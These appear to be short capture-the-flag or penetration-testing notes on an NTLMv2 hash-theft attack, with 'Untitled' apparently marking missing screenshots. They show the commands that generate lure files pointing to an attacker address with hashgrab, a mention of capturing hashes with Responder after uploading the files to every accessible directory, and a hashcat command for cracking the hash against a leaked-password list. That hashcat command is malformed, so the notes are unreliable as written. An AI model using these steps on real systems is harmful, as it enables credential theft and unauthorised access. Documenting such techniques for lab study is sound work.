Untitled

we are going to create a bunch of files which will lead to a NTLMv2 hash stealing attack using this tool: https://github.com/xct/hashgrab

sudo python /opt/Tools/hashgrab/hashgrab.py 10.8.0.27 rohit

Untitled

Untitled

after starting responder in analyse mode and uploading all files to every directory we have access to we got some hash

Untitled

Untitled

sudo -m 5600 hashcat hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt

Untitled